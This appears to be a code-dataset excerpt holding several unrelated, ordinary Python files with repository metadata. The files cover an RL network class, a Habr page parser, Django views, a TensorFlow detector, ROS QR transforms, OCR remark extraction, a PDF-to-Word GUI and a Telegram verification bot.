        # Tell every trainable layer to stash its current learnable parameters.
        # Actor
        for layer in self._layers_actor.values():
            if layer.trainable == True:
                layer.keep_temporarily_learnable_params()
        self._out_actor_mu.keep_temporarily_learnable_params()
        self._out_actor_log_var.keep_temporarily_learnable_params()
        # Critic
        for layer in self._layers_critic.values():
            if layer.trainable == True:
                layer.keep_temporarily_learnable_params()

    def _adopt_all_learnable_params_kept_temporarily(self):
        # Tell every trainable layer to adopt its stashed learnable parameters.
        # Actor
        for layer in self._layers_actor.values():
            if layer.trainable == True:
                layer.adopt_learnable_params_kept_temporarily()
        self._out_actor_mu.adopt_learnable_params_kept_temporarily()
        self._out_actor_log_var.adopt_learnable_params_kept_temporarily()
        # Critic
        for layer in self._layers_critic.values():
            if layer.trainable == True:
                layer.adopt_learnable_params_kept_temporarily()

    def _sum_all_weights_square(self, role):
        # role: Actor (0) or Critic (1)
        # Return the sum of squared weights over all trainable weight-bearing
        # layers and output layers; used for weight decay.
        if role==0:
            # Actor
            sum_of_weights_square = 0
            for layer in self._layers_actor.values():
                if layer.trainable == True and isinstance(layer, Affine):
                    sum_of_weights_square += layer.sum_weights_square()
            sum_of_weights_square += self._out_actor_mu.sum_weights_square()
            sum_of_weights_square += self._out_actor_log_var.sum_weights_square()
        elif role==1:
            # Critic
            sum_of_weights_square = 0
            for layer in self._layers_critic.values():
                if layer.trainable == True and isinstance(layer, Affine):
                    sum_of_weights_square += layer.sum_weights_square()
        else:
            sum_of_weights_square = 0
        return sum_of_weights_square

    @property
    def name(self):
        return self._name

    @name.setter
    def name(self, name):
        self._name = name

    @property
    def env(self):
        return self._env

    @property
    def state_dim(self):
        return self._state_dim

    @property
    def action_dim(self):
        return self._action_dim
{
"api_name": "numpy.ceil",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.int",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "collections.OrderedDict",
"l... |
12646195802 | from html.parser import HTMLParser
from read_site_content import read_site_content
import datetime
import all_id_pages
class HabrPageParser(HTMLParser):
bull_title = False
bull_user = False
bull_hash = False
bull_ul = False
bull_data = False
title=''
user = ''
data = []
hash = []
def handle_starttag(self, tag, attrs):
if tag == 'ul':
for attr in attrs:
if attr[1] == 'post__hubs post__hubs_full-post inline-list':
self.bull_ul=True
if tag == 'a':
for index, attr in enumerate(attrs):
if str(attr[1])[21:25] == 'hub/':
self.hash.append(str(attr[1])[25:])
if str(attr[1]) == 'inline-list__item-link hub-link ':
if str(attrs[index - 1][1])[21:29] == 'company/':
self.hash.append(str(attrs[index - 1][1])[29:])
self.bull_ul = False
if tag == 'span':
for attr in attrs:
if attr[1] == 'post__title-text':
self.bull_title = True
if attr[1] == 'user-info__nickname user-info__nickname_small':
self.bull_user = True
if attr[1] == 'post__time':
self.bull_data = True
def handle_data(self, data):
day=''
month=''
year=''
time=''
if self.bull_title:
self.title = data
self.bull_title = False
if self.bull_user:
self.user = data
self.bull_user = False
if self.bull_hash:
self.hash = data
self.bull_hash = False
if self.bull_data:
split = data.lstrip().split(' ')
all_month = {'января':1, 'февраля':2, 'марта':3, 'апреля':4, 'мая':5, 'июня':6,
'июля':7, 'августа':8, 'сентября':9, 'октября':10, 'ноября':11,'декабря':12,}
if split[0] == 'вчера' or split[0] == 'сегодня':
date = datetime.datetime.today()
yesterday_date = date - datetime.timedelta(days=1)
all_date = {'вчера':yesterday_date.day, 'сегодня':date.day}
day = all_date.get(split[0])
month = date.month
else:
day = split[0]
month = all_month.get(split[1])
time =split[-1].split(':')
if len(split) > 4:
year = split[2]
else:
year = str(datetime.datetime.now()).split('-')[0]
self.data = datetime.datetime(int(year), int(month), int(day), int(time[0]),int(time[1]))
self.bull_data = False
def clean_hash(self):
self.hash = []
id_pages = all_id_pages.all_id_pages[:3]
print('id_pages ', id_pages )
def parse_page(id_pages):
lenn = len(id_pages)
parser = HabrPageParser()
result=[]
for index, id_page in enumerate(id_pages):
print(index,'/',lenn)
link = 'https://habrahabr.ru/post/' + id_page[1]
habr_page = read_site_content(link)
parser.feed(habr_page)
id = id_page[1]
type = id_page [0]
title = parser.title
author = parser.user
hashes = parser.hash
parser.clean_hash()
data = parser.data
result.append([id, type, title, author, data, hashes])
return result
| gugry/FogStreamEdu | lesson8_conclusion_of_SQL/HabrPageParser.py | HabrPageParser.py | py | 3,580 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "html.parser.HTMLParser",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.today",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 68,
"usage_type": "attribute"
},
{
"api_name": "... |
73800489312 | import logging
from concurrent.futures import ThreadPoolExecutor
from time import sleep
from typing import List, Any, Union
from django.core.files.uploadedfile import InMemoryUploadedFile
from app.forms import UploadFilesForm
from app.models import TaxonomyAbundance
from app.util.file_parser import parse_taxonomy_file, FILE_TYPE_TAXONOMY, TaxonomyAbundanceParserResult, \
FILE_TYPE_TAXONOMY_MERGED, parse_taxonomy_merged_file, TaxonomyParserResult
from app.util.helper import Message
# import logging as log
from app.views_admin import *
# Get an instance of a logger
log = logging.getLogger("app")
@login_not_required
def public_index(request):
log.info("public page")
return render(request, 'public/index.html')
def dashboard(request):
return render(request, 'dashboard.html')
# class UploadFilesView(FormView):
# form_class = UploadFilesForm
# template_name = 'upload_files.html'
# success_url = 'upload_files.html'
#
# def post(self, request, *args, **kwargs):
# form_class = self.get_form_class()
# form = self.get_form(form_class)
# files = request.FILES.getlist('files')
# if form.is_valid():
# for f in files:
# ... # Do something with each file.
# return self.form_valid(form)
# else:
# return self.form_invalid(form)
def upload_files(request):
if request.method == 'POST':
log.debug("request.user %s", request.user)
form = UploadFilesForm(request.POST, request.FILES, user=request.user, )
messages = []
if form.is_valid():
# files = form.cleaned_data['files']
files = request.FILES.getlist('files')
file_type = form.cleaned_data['type']
project = form.cleaned_data['project']
if file_type == FILE_TYPE_TAXONOMY:
for f in files:
tax_parse_result = parse_taxonomy_file(f)
messages.extend(handle_one_sample_taxonomy(project, tax_parse_result))
if file_type == FILE_TYPE_TAXONOMY_MERGED:
for f in files:
result: List[TaxonomyParserResult] = parse_taxonomy_merged_file(f)
for tax_parser_result in result:
messages.extend(handle_one_sample_taxonomy(project, tax_parser_result))
form = UploadFilesForm(user=request.user)
return render(request, 'upload_files.html',
{'form': form, 'message': 'Sve ok uneseno u formu', 'messages': messages})
else:
form = UploadFilesForm(user=request.user)
return render(request, 'upload_files.html', {'form': form, 'message': ''})
def handle_one_sample_taxonomy(project: Project, tax_parse_result: TaxonomyParserResult) -> List[str]:
messages = []
sample: Sample = Sample.objects.filter(name=tax_parse_result.sample_name).first()
if sample is not None:
messages.append(f"Exist sample {tax_parse_result.sample_name}, remove prijasnje rezultate")
TaxonomyAbundance.objects.filter(sample=sample).delete()
else:
messages.append(f"Create new sample {tax_parse_result.sample_name} in project {project.name}")
sample = Sample.objects.create(name=tax_parse_result.sample_name, project=project)
sample.save()
tax_parse_result.normalise()
tax: TaxonomyAbundanceParserResult
taxes = []
for tax in tax_parse_result.taxonomy_abundances:
if tax.abundance == 0:
continue
tax = tax.to_model()
tax_int = tax.to_int_model()
tax.sample = sample
taxes.append(tax)
if len(taxes) > 5_000:
log.debug(f"spremam 5 000 njih prvo")
TaxonomyAbundance.objects.bulk_create(taxes)
taxes.clear()
log.debug(f"spremam u bazu ostatak od {len(taxes)} redova za sample {sample.name}, bilo ih je {len(tax_parse_result.taxonomy_abundances)}")
TaxonomyAbundance.objects.bulk_create(taxes)
log.debug(f"gotovo")
messages.append(f"Add {len(taxes)} taxonomy-abundances into db")
return messages
# @permission_required("dsf")
# @login_required
# def projects(request):
# my_projects = Project.objects.filter(user_admins=request.user)
# return render(request, 'projects.html', {"projects": my_projects})
# def projects_new(request):
# if request.method == 'POST':
# form = CreateProjectForm(request.POST)
#
# if form.is_valid():
# new_project: Project = form.save(False)
# new_project.user_creator = request.user
#
# new_project.save()
# new_project.user_admins.add(request.user)
# new_project.save()
# print(form.cleaned_data)
#
# messages.add_message(request, messages.INFO, f"Successfully added project '{new_project.name}'.")
# return HttpResponseRedirect(reverse('projects'))
# else:
# id = request.GET.get('id')
# if id is not None:
# project = get_object_or_404(Project, pk=id)
# # if project.user_admins. != request.user:
# # return HttpResponseForbidden()
# form = CreateProjectForm(instance=project)
# print(project)
# else:
# form = CreateProjectForm()
#
# return render(request, 'projects_new.html', {'form': form})
class ProjectViewMixin(UserPassesTestMixin):
def test_func(self):
pass
# class CheckUserIsProjectAdmin(LoginRequiredMixin):
#
#
# class UserPassesTestMixin(LoginRequiredMixin):
# """Verify that the current user is authenticated."""
#
#
#
# def get_project(self):
#
# def dispatch(self, request, *args, **kwargs):
# return super().dispatch(request, *args, **kwargs)
# LoginRequiredMixin,
class ProjectListView(UserPassesTestMixin, ListView):
model = Project
def get_queryset(self):
u: CustomUser = self.request.user
return Project.objects.filter(member=u)
def test_func(self, **kwargs):
return True
class ProjectCreateView(CreateView):
# Ko si moze raditi projekt? ????
model = Project
form_class = ProjectForm
def form_valid(self, form):
project: Project = form.instance
user: CustomUser = self.request.user
project.created_by = user
form.save()
Membership.objects.create(project=project, user=user, role=UserRole.ADMIN.value)
return super().form_valid(form)
class ProjectDetailView(DetailView):
model = Project
def get_object(self, queryset=None):
project: Project = super(ProjectDetailView, self).get_object(queryset)
if not Membership.is_user_project_member(project, self.request.user):
raise Http404("dont have permission")
return project
class ProjectUpdateView(UpdateView):
model = Project
form_class = ProjectForm
def get_object(self, queryset=None):
p = super(ProjectUpdateView, self).get_object(queryset)
if not Membership.is_user_project_admin(p, self.request.user):
raise Http404(Message.dont_have_permission)
return p
class SampleListView(ListView):
model = Sample
def get_queryset(self):
u: CustomUser = self.request.user
membership = Membership.objects.filter(user=u)
project_ids = []
m: Membership
for m in membership:
project_ids.append(m.project.id)
print("Nasao project ids ", project_ids)
return Sample.objects.filter(project__in=project_ids)
class SampleCreateView(CreateView):
model = Sample
form_class = SampleForm
def get_object(self, queryset=None):
super()
class SampleDetailView(DetailView):
model = Sample
class SampleUpdateView(UpdateView):
model = Sample
form_class = SampleForm
class SampleFilesListView(ListView):
model = SampleFiles
paginate_by = 10
def get_queryset(self):
q = super(SampleFilesListView, self).get_queryset()
q = q.prefetch_related('sample', 'sample__project')
return q
class SampleFilesCreateView(CreateView):
model = SampleFiles
form_class = SampleFilesForm
class SampleFilesDetailView(DetailView):
model = SampleFiles
class SampleFilesUpdateView(UpdateView):
model = SampleFiles
form_class = SampleFilesForm
| jankod/UMCGMicrobiomeWeb | app/views.py | views.py | py | 8,385 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "app.forms.UploadFilesForm",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "app.util.file_parser.FILE_TYPE_TAXONOMY",
"line_number": 57,
"usage_type": "name"
},
{
... |
73698769953 | import logging
from abc import ABC
import tensorflow as tf
from detectors.AbstractDetector import AbstractDetector
from utils.setup_logger import logger
from utils.tensorflow import label_map_util
from utils.util import *
# Create class logger
logger = logging.getLogger('TensorFlowDetector')
class TensorFlowDetector(AbstractDetector, ABC):
def __init__(self):
logger.info('Initializing')
# Load config
self.config = load_config()['object_detection']
self.config_tf = self.config['tensorflow']
# Create empty attribute fields
self.sess = None
self.image_tensor = None
self.detection_boxes = None
self.detection_scores = None
self.detection_classes = None
self.num_detections = None
# Load label map for visualisation
self.category_index = self.load_label_map()
def load_label_map(self):
""" Load the label map.
:return: TensorFlow specific label map
"""
logger.info('Loading label map')
label_map = label_map_util.load_labelmap(self.config_tf['label_map'])
categories = label_map_util.convert_label_map_to_categories(label_map,
max_num_classes=self.config_tf['max_class_id'],
use_display_name=True)
return label_map_util.create_category_index(categories)
def load_model(self):
""" Load the TensorFlow model into memory and get tensor names
"""
logger.info('Loading model')
# Set gpu device for process
os.environ["CUDA_VISIBLE_DEVICES"] = str(self.config['gpu_id'])
# with tf.device('/gpu:{}'.format(self.config['gpu_id'])):
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(self.config_tf['graph_path'], 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
# Save session for later access
self.sess = tf.Session(graph=detection_graph)
# Input tensor is the image
self.image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Output tensors are the detection boxes, scores, and classes
# Each box represents a part of the image where a particular object was detected
self.detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represents level of confidence for each of the objects.
# The score is shown on the result image, together with the class label.
self.detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')
self.detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')
# Number of objects detected
self.num_detections = detection_graph.get_tensor_by_name('num_detections:0')
logger.info('Model loaded')
def detect(self, frames):
""" Runs the detection for one or more frames with the loaded model.
:param frames: loaded and preprocessed frames
:return: (boxes, scores, classes, num)
"""
# Perform the actual detection by running the model with the frame as input
return self.sess.run(
[self.detection_boxes, self.detection_scores, self.detection_classes, self.num_detections],
feed_dict={self.image_tensor: frames})
def visualize(self, frames, detections):
""" Visualize detections in frames
"""
# TODO create
pass
def process_detections(self, results, append_all_detections_dict, append_per_class_dict):
((boxes, scores, classes, num), video_meta) = results
# Get detections above threshold
detections = np.where(scores >= self.config_tf['thresh'])
# Iterate through detections in frames
for frame_i in np.unique(detections[0]).tolist():
# Count objects in scene
objects_in_scene_count = np.where(detections[0] == frame_i)[0].size
# Create empty placeholder
timestamp = 0
class_id = []
score = []
bbox = []
# Iterate objects in scene
for object_i in range(objects_in_scene_count):
# Get object information
timestamp = video_meta['timestamps'][detections[0][object_i]]
class_id.append(int(classes[detections][object_i]))
score.append(scores[detections][object_i])
# Transform relative to absolute values
ymin, xmin, ymax, xmax = boxes[detections][object_i].tolist()
bbox.append({
'ymin': ymin * video_meta['im_height'],
'xmin': xmin * video_meta['im_width'],
'ymax': ymax * video_meta['im_height'],
'xmax': xmax * video_meta['im_width']
})
# Append to all_detections dict
append_all_detections_dict(video_meta['filename'], timestamp, class_id[object_i], score[object_i],
bbox[object_i], object_i + 1, objects_in_scene_count)
# Append to per_class_detections dict
append_per_class_dict(video_meta['filename'], timestamp, class_id, score)
| tdiekel/Video-Object-Detection | detectors/TensorFlowDetector.py | TensorFlowDetector.py | py | 5,547 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "utils.setup_logger.logger",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "logging.getLogger",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "detectors.AbstractDetector.AbstractDetector",
"line_number": 15,
"usage_type": "name"
},
... |
26344566280 | #!/usr/bin/env python
import rospy
from tf2_msgs.msg import TFMessage
import tf
from tf.transformations import euler_from_quaternion
from std_msgs.msg import String
from geometry_msgs.msg import PoseStamped
import numpy as np # For random numbers
import tf
import time
import math
import geometry_msgs.msg
class Transformation:
def __init__(self):
self.pose = None
self.code = ''
self.d = []
self.sec = []
self.number_qr = None
rospy.Subscriber('visp_auto_tracker/code_message', String, self._code_cal)
rospy.Subscriber('visp_auto_tracker/object_position', PoseStamped, self._obj_cal)
self.br = tf.TransformBroadcaster()
self.listener = tf.TransformListener() # to get translation & rotations between the frames
self.pr = tf.TransformBroadcaster() # to publish new frames
self.trs = {} # dictionary for storing all info from the qr
# Create callback. This is what happens when a new message is received
def _obj_cal(self, msg):
self.pose = msg.pose
def _code_cal(self, msg):
# import pdb; pdb.set_trace()
self.code = msg.data # to get output from the qr code
if self.code is not '': # split the output & use it afterwards
fir = self.code.split("\r\n")
self.sec = []
for i, e in enumerate(fir):
self.sec.append(e.split("="))
self.number_qr = self.sec[-2][1]
def get_qr_code(self):
if self.code is not '':
now = rospy.Time.now()
self.br.sendTransform([self.pose.position.x, self.pose.position.y, self.pose.position.z],
[self.pose.orientation.x, self.pose.orientation.y, self.pose.orientation.z,
self.pose.orientation.w],
now,
"qr_frame",
"camera_optical_link")
#rospy.sleep(3.)
self.listener.waitForTransform("/map", "/qr_frame", now, rospy.Duration(4.0))
try:
# http://wiki.ros.org/tf/Tutorials/tf%20and%20Time%20%28Python%29
self.listener.waitForTransform("/map", "/qr_frame", now, rospy.Duration(4.0))
(trans1, rot1) = self.listener.lookupTransform('/map', '/qr_frame', now)
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException) as e:
print(e)
# Use qr_code to map frame translations
self.pr.sendTransform(trans1,
[0.0, 0.0, 0.0, 1.0],
now,
"tr_frame",
"map")
qr_name = 'qr_%d' % float(self.number_qr)
if qr_name not in self.trs:
self.trs[qr_name] = [trans1, float(self.sec[0][1]), float(self.sec[1][1]), float(self.sec[2][1]),
float(self.sec[3][1]),
float(self.sec[4][1]), self.sec[5][1]]
self.d.append(qr_name)
return now
def get_hidden_frame(self, timestamp):
if len(self.trs) == 2: # if you detect two qr codes
# name = trs.keys() #list of keys for the dictionary
qr1_coords_world = self.trs[self.d[0]][0]
qr2_coords_world = self.trs[self.d[1]][0]
qr1_coords_qr = self.trs[self.d[0]][1:3]
qr2_coords_qr = self.trs[self.d[1]][1:3]
world_x = qr2_coords_world[0] - qr1_coords_world[0] # create vector
world_y = qr2_coords_world[1] - qr1_coords_world[1]
distance_w = math.sqrt(world_x ** 2 + world_y ** 2) # Modulus
theta_w = math.acos(world_y / distance_w) # Angle of rotation
if world_x < 0.0: theta_w = 2 * math.pi - theta_w
qr_x = qr2_coords_qr[0] - qr1_coords_qr[0]
qr_y = qr2_coords_qr[1] - qr1_coords_qr[1]
distance_qr = math.sqrt(qr_x ** 2 + qr_y ** 2) # Modulus
theta_qr = math.acos(qr_y / distance_qr) # Angle of rotation
if qr_x < 0.0: theta_qr = 2 * math.pi - theta_qr
final_theta = theta_qr - theta_w # rotation between qr codes frame and map frame
print("Angle between hidden and map frame:", final_theta)
now = timestamp
# to get zero rotation wrt qr codes frame
self.pr.sendTransform([0.0, 0.0, 0.0], tf.transformations.quaternion_from_euler(0.0, 0.0, final_theta),
now,
"rr_frame",
"tr_frame")
#now = rospy.Time.now()
# translate to qr codes frame, Bingo
self.pr.sendTransform([-qr2_coords_qr[0], -qr2_coords_qr[1], 0.0],
tf.transformations.quaternion_from_euler(0.0, 0.0, 0.0),
now,
"qr_pre_frame",
"rr_frame")
# now you need to save wrt something static, because it vanishes after you move
self.listener.waitForTransform("/map", "/qr_pre_frame", timestamp, rospy.Duration(4.))
success = False
try:
#now = rospy.Time.now()
self.listener.waitForTransform('/map', 'qr_pre_frame', now, rospy.Duration(4.0))
(trans2, rot2) = self.listener.lookupTransform('/map', '/qr_pre_frame', now)
success = True
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException) as e:
print(e)
final_now = rospy.Time.now()
self.pr.sendTransform(trans2, rot2,
final_now,
"qr_coordinate_frame",
"map")
return final_now
| max-27/final_project | scripts/transformations.py | transformations.py | py | 4,762 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "rospy.Subscriber",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "std_msgs.msg.String",
"line_number": 24,
"usage_type": "argument"
},
{
"api_name": "rospy.Subscriber",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "geometry_ms... |
28602910056 | '''
「検査陽性者の状況」画像から注記を抽出する処理 パターン2
'''
import re
import pytesseract
import cv2
import numpy as np
# 画像内の矩形を抽出
# https://stackoverflow.com/a/60068297
def cropTable(src):
hei = src.shape[0]
wid = src.shape[1]
totalArea = wid * hei
original = src.copy()
gray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)
thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]
# Find contours, obtain bounding box, extract and save ROI
ROI_number = 0
cnts = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if len(cnts) == 2 else cnts[1]
lst = []
for c in cnts:
x,y,w,h = cv2.boundingRect(c)
cv2.rectangle(src, (x, y), (x + w, y + h), (36,255,12), 2)
ROI = original[y:y+h, x:x+w]
# cv2.imwrite('ROI_{}.png'.format(ROI_number), ROI)
# 面積が最大の矩形を記憶(ただし画像全体を覆う矩形は除外)
area = w * h
if (totalArea * 0.9) > area:
lst.append((ROI_number, area, x, y, w, h))
ROI_number += 1
# 矩形面積の降順に並び替え
lst.sort(key=lambda x:-x[1])
# 1番目:「クラスターの感染」、2番目:「○月~」なハズなので
# 2番目の y+h から 1番目の y までを切りだす
first = lst[0]
scond = lst[1]
top = (scond[3]+scond[5])
bottom = first[3]
if top >= bottom:
print("注記位置を特定できませんでした")
return src
img = original[top:bottom]
return img
# 拡大と白黒化
def grayAndResize(src):
neiborhood24 = np.array(
[
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
],
np.uint8,
)
height = src.shape[0]
width = src.shape[1]
dilated = cv2.dilate(src, neiborhood24, iterations=1)
diff = cv2.absdiff(dilated, src)
contour = 255 - diff
gray2 = cv2.resize(contour, (int(width * 2), int(height * 2)))
th, img = cv2.threshold(gray2, 180, 255, cv2.THRESH_BINARY)
return img
def recognize(jpg_path):
src = cv2.imread(str(jpg_path))
hei = src.shape[0]
wid = src.shape[1]
# 画像の上25%~60%でカット
img = src[int(hei * 0.25):int(hei * 0.6)]
# cv2.imwrite('remarks_ptn2_1_cropped.jpg', img)
# 画像内の矩形を抽出
img = cropTable(img)
# cv2.imwrite('remarks_ptn2_2_rected.jpg', img)
# 拡大と白黒化
img = grayAndResize(img)
# cv2.imwrite('remarks_ptn2_3_resized.jpg', img)
# 範囲指定
# ref http://blog.machine-powers.net/2018/08/02/learning-tesseract-command-utility/
txt = pytesseract.image_to_string(img, lang="jpn", config="--psm 11").replace(".", "").replace(",", "")
print(txt)
# ※1 ※2 または (注) で始まる文を抽出
remarks = re.findall("^(.*?\d{1} .*|\(.?.* .*)$", txt, re.M)
def normalize(txt):
# 行頭の ※1 ※2 や (注) を削除(空白以降を抽出)
txt = txt[txt.find(' ') + 1:]
# 空白を除去
txt = txt.replace(' ', '')
# 画像切れて認識できない「掲載。」を補完
txt = re.sub('検査を行ったものについて掲.*$', '検査を行ったものについて掲載。', txt)
return txt
remarks = list(map(normalize, remarks))
print(remarks)
return remarks
| code4nagoya/covid19-aichi-tools | recognize_main_summary_remarks_2.py | recognize_main_summary_remarks_2.py | py | 3,539 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "cv2.cvtColor",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRAY",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "cv2.threshold",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "cv2.THRESH_BINARY_... |
22048125267 | from cProfile import label
from tkinter import*
from tkinter import messagebox
from tkinter.filedialog import askopenfilename
import os
# import win32com.client
from pdf2docx import Converter
class ventana(Tk):
# Constructor
def __init__(self,*args,**kwargs):
super().__init__(*args,**kwargs)
self.title("Convertidor de pdf a word")
self.geometry("300x200")
self.resizable(0,0)
self.widgest()
def salir(self):
valor = messagebox.askquestion(title="Convertidor de pdf a word",message="¿Esta seguro que deseas salir?")
if valor == "yes":
self.destroy()
def archivo(self):
valor = askopenfilename(defaultextension=".pdf",filetypes=[("Selecciona solo archivos .pdf","*.pdf")])
if valor:
self.generate_word2(valor)
def generate_word2(self,valor):
try:
labelFile = Label(self,text="Cargando...")
labelFile.place(x=30,y=39)
ruta = os.path.abspath(valor)
ruta_final = os.path.abspath(valor[0:-4] +".docx".format())
cv = Converter(ruta)
cv.convert(ruta_final,start=0,end=None)
cv.close()
labelFile.destroy()
messagebox.showinfo(title="Convertidor de pdf a word",message='El archivo se genero correctamente en la siguiente ruta: '+ruta_final)
except Exception as e :
messagebox.showerror(title="Convertidor de pdf a word",message=str(e))
# def generate_word(self,valor):
# try:
# word = win32com.client.Dispatch("word.Application")
# word.visible = 0
# ruta = os.path.abspath(valor)
# wb=word.Documents.Open(ruta)
# ruta_final = os.path.abspath(valor[0:-4] +"docx".format())
# wb.SaveAs2(ruta_final,FileFormat=16)
# wb.Close()
# word.Quit()
# # labelFile.destroy()
# messagebox.showinfo(title="Convertidor de pdf a word",message='El archivo se genero correctamente en la siguiente ruta: '+ruta_final)
# except Exception as e :
# messagebox.showerror(title="Convertidor de pdf a word",message=str(e))
def widgest(self):
labelFile=Label(self,text="Selecciona el pdf que deseas convertir.")
labelFile.place(x=30,y=15)
# Botones
btnquitar=Button(self, text="Seleccionar Archivo", command=self.archivo, width=35)
btnquitar.place(x=30, y=90)
btnquitar=Button(self,text="Salir", command=self.salir, width=35)
btnquitar.place(x=30, y=130)
if __name__ == "__main__":
app=ventana()
app.mainloop() | DarguinBarbosa/Convert-pdf---word | convert.py | convert.py | py | 2,661 | python | es | code | 2 | github-code | 1 | [
{
"api_name": "tkinter.messagebox.askquestion",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "tkinter.messagebox",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "tkinter.filedialog.askopenfilename",
"line_number": 24,
"usage_type": "call"
},
{
... |
11669927645 | # 9-13 Practice
from collections import OrderedDict
word_dict = OrderedDict()
word_dict['if'] = "如果"
word_dict['else'] = "其他情况"
word_dict['for'] = "有限循环"
word_dict['while'] = "无限循环"
word_dict['raise'] = "抛出异常"
word_dict['try'] = "捕获异常"
word_dict['catch'] = "处理异常"
word_dict['finally'] = "捕获异常之后"
word_dict['def'] = "函数"
word_dict['break'] = "停止"
for k, v in word_dict.items():
print(k + ": " + v)
# 9-14 Practice
from random import randint
class Die():
def __init__(self, sides=6):
self.sides = sides
def roll_die(self):
return randint(1, self.sides)
six_sides = Die(6)
ten_sides = Die(10)
twenty_sides = Die(20)
for side in range(0, 10):
print("第" + str(side + 1) + "次: " + str(six_sides.roll_die()))
for side in range(0, 10):
print("第" + str(side + 1) + "次: " + str(ten_sides.roll_die()))
for side in range(0, 10):
print("第" + str(side + 1) + "次: " + str(twenty_sides.roll_die()))
# 9-15 Practice
# Python module of the week | bombasticRY/PythonCrashCourse-Chapter1-11 | Chapter9/05HM.py | 05HM.py | py | 1,066 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "collections.OrderedDict",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 27,
"usage_type": "call"
}
] |
34024693827 | #!/usr/bin/env python
"""Setup script for installing sofia."""
from setuptools import setup
config = {
'name': 'sofia',
'version': '0.0.1',
'description': 'GUI',
'author': 'Danna Xue',
'author email': 'dannaxue@stanford.edu',
'url': 'https://github.com/dannaxue/sofia.git',
'download_url': 'https://github.com/dannaxue/sofia',
'license': 'MIT',
'packages': ['sofia'],
'scripts': ['bin/sofia']
}
setup(**config)
| dannaxue/sofia | setup.py | setup.py | py | 455 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "setuptools.setup",
"line_number": 19,
"usage_type": "call"
}
] |
40891943622 | import asyncio
from datetime import datetime
from aiogram import types
from aiogram.utils.markdown import code
from init import bot, config, dp
from utils import try_sending_message
from verify import *
from verify import Status
# init
async def on_startup(app) -> None:
"""Simple hook for aiohttp application which manages webhook"""
await bot.delete_webhook()
await bot.set_webhook(config["webhook_url"])
async def start_worker() -> None:
await bot.delete_webhook()
await dp.start_polling()
# handlers
@dp.callback_query_handler()
async def pressed_verification_button(cb: types.CallbackQuery) -> None:
user_id = cb.from_user.id
chat_id = cb.message.chat.id
key = cb.data
if not Verify.can_verify(chat_id, user_id):
return
if key == config["key"]:
await Verify.authorize(chat=cb.message.chat, user_id=user_id)
text = f"Welcome {code(cb.from_user.full_name)}, have a lot of fun!"
await try_sending_message(bot, chat_id=chat_id, text=text, parse_mode="Markdown")
elif Verify.has_last_chance(chat_id, user_id):
text = "Incorrect answer. Make sure to get it right next time or you will be banned *permanently*."
response_msg = await try_sending_message(bot,
chat_id=chat_id, text=text, parse_mode="Markdown"
)
Verify.chats[chat_id].users[user_id].pending_messages_ids.append(
response_msg.message_id
)
else:
await Verify.reject(bot, cb.message.chat, user_id)
@dp.message_handler(content_types=types.ContentTypes.NEW_CHAT_MEMBERS)
async def just_joined(message: types.Message) -> None:
user_id: int = message.from_user.id
user_name: str = message.from_user.username or message.from_user.full_name
chat = message.chat
if not Verify.can_request_verification(chat.id, user_id):
return
values = [getattr(u, "_values") for u in message.new_chat_members]
uids = [u["id"] for u in values if not u["is_bot"]]
if not uids:
return
response_msg = await try_sending_message(
bot,
chat_id=chat.id,
text=f"Hi [@{user_name}](tg://user?id={str(user_id)})! Please answer the question below within the next (*{config['delay']} seconds*). Which emoji below represents an animal often associated with openSUSE?",
parse_mode="Markdown",
reply_markup=create_verification_keyboard(),
)
for task in asyncio.as_completed([Verify.restrict(chat, _id) for _id in uids]):
uid = await task
if not chat.id in Verify.chats:
Verify.chats[chat.id] = Chat(chat.id)
Verify.chats[chat.id].users[uid] = User(
pending_messages_ids=[response_msg.message_id],
joined_at=datetime.now(),
attempts=0,
status=Status.challenged_to_verify,
)
Verify.schedule_reject(bot, chat, uid)
@dp.message_handler(content_types=types.ContentTypes.ANY)
async def handle_otherwise(_any) -> None:
print(f"Silently handled: {_any}")
if __name__ == "__main__":
    from sys import argv
    import uvloop
    # uvloop replaces the default asyncio event loop implementation.
    loop = uvloop.new_event_loop()
    asyncio.set_event_loop(loop)
    if len(argv) >= 2 and "--webhook" in argv:
